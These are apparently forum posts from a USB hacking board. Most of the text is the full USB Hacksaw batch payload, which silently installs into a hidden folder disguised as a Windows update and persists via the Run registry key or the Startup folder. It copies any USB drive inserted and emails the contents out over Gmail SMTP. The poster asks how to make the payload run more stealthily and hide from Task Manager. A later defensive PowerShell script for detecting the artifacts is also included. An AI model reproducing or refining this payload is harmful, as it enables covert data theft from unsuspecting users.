Posts posted by brfield
With hidden "Files and Folders" enabled you will still be screwed. You have to follow this process; I had the same problem:
Tools-->Folder Options-->uncheck HIDE PROTECTED SYSTEM OPERATING FILES(RECOMMENDED)
Then edit the send.bat
-
I have made this to auto run on non-U3 drives silently and have done some other tweaks to make this more efficient, but I cannot for the life of me get cmd to exit automatically!
The window never shows, you don't see a thing, but how do I get it to exit? If you open Task Manager, under Processes you will see cmd.exe. Can I make this kill itself or exit?
if exist C:Void.txt GOTO end
::Use /\/\ to keep from infecting yourself
:: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc
:: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss
::
:: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently
:: install on windows 2000, XP, or 2003 machines with either administrator or guest access.
:: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or
:: startup folder depending on user rights, and start the program.
::
:: This hack is based on a modified version of USBDumper. Once installed on a target machine it will
:: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the
:: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper,
:: then silently run the send.bat file located in the same directory, which will then archive the contents
:: using RAR, establish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the
:: downloaded data to an email address, and remove the documents and archives.
::
:: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method
:: for determining user rights and thus installing accordingly was planned, however problems with the
:: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more
:: elegant method of determining user privileges. (Thinking out loud: try creating a file where guests
:: shouldn't be able to and check errorlevel).
::
:: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org
:: Programs used:
:: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml
:: Stunnel -- http://www.stunnel.org/
:: Blat -- http://www.blat.net/
:: Shortcut -- http://www.optimumx.com/download/#Shortcut
:: Rar -- http://www.rarlabs.com/
::
:: More information and future developments of this hack can be found at:
:: http://www.hak5.org/wiki/USB_Hacksaw

:: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs
mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs"

:: go to payload directory
cd \WIP\SBS

:: remove hidden and system attributes (makes next copy command happy, probably better way to do this)
attrib *.* -s -h

:: copy payload to target
copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs"

:: reapply hidden and system attributes
attrib *.* +s +h

:: If admin register USB Hacksaw as startup program in registry, else do it the yucky way
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico"

:: Hide USB Hacksaw
attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h

:: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below)
:: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe"
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB931337$
sbs.exe
:end
I have tried:
exit
@exit
taskkill /f /cmd.exe
exit /b 1
close
How can I make it end itself? Make it not seen in Task Manager
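For anyone checking a machine for this payload, the following PowerShell sketch looks for the install artifacts the script above creates: the two install folders, the `USBMedia` Run value, a Startup shortcut pointing at `sbs.exe`, and a running `sbs` process. It is an added example, not part of the original post or the Hacksaw project; the function name `Find-HacksawArtifacts` is hypothetical, and the paths and value name are taken from the posted script.

```powershell
# Added example (not from the original post). Read-only check for the
# artifacts the posted script installs; the function name is hypothetical.
function Find-HacksawArtifacts {
    $findings = @()

    # 1. Install folders. They carry +s +h attributes, so list with -Force.
    $dirs = @(
        (Join-Path $env:SystemRoot '$NtUninstallKB931337$'),
        (Join-Path $env:APPDATA 'sbs')
    )
    foreach ($d in $dirs) {
        if (Test-Path -LiteralPath $d) {
            $names = Get-ChildItem -LiteralPath $d -Force -ErrorAction SilentlyContinue |
                     Select-Object -ExpandProperty Name
            $findings += [pscustomobject]@{ Type = 'Folder'; Location = $d; Detail = ($names -join ', ') }
        }
    }

    # 2. Admin-path persistence: the HKLM Run value named USBMedia.
    $runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    $run = Get-ItemProperty -Path $runKey -Name 'USBMedia' -ErrorAction SilentlyContinue
    if ($run) {
        $findings += [pscustomobject]@{ Type = 'RunValue'; Location = "$runKey\USBMedia"; Detail = $run.USBMedia }
    }

    # 3. Non-admin persistence: a Startup shortcut whose target is ...\sbs\sbs.exe.
    #    The posted script names it " .lnk", so match on the target, not the name.
    $startup = [Environment]::GetFolderPath('Startup')
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -LiteralPath $startup -Filter *.lnk -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $target = $shell.CreateShortcut($_.FullName).TargetPath
            if ($target -match '\\sbs\\sbs\.exe$') {
                $findings += [pscustomobject]@{ Type = 'StartupLink'; Location = $_.FullName; Detail = $target }
            }
        }

    # 4. The resident process started by the last lines of the script.
    Get-Process -Name 'sbs' -ErrorAction SilentlyContinue | ForEach-Object {
        $findings += [pscustomobject]@{ Type = 'Process'; Location = "PID $($_.Id)"; Detail = $_.Path }
    }

    $findings
}

Find-HacksawArtifacts | Format-Table -AutoSize -Wrap
```

The Startup check only covers the profile of the user running it; run it per user, or elevated against each profile, to cover the non-admin install path.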
DingleBerries Tantō Payload
in USB Hacks
Posted
Links are all still down. When will you have them back up?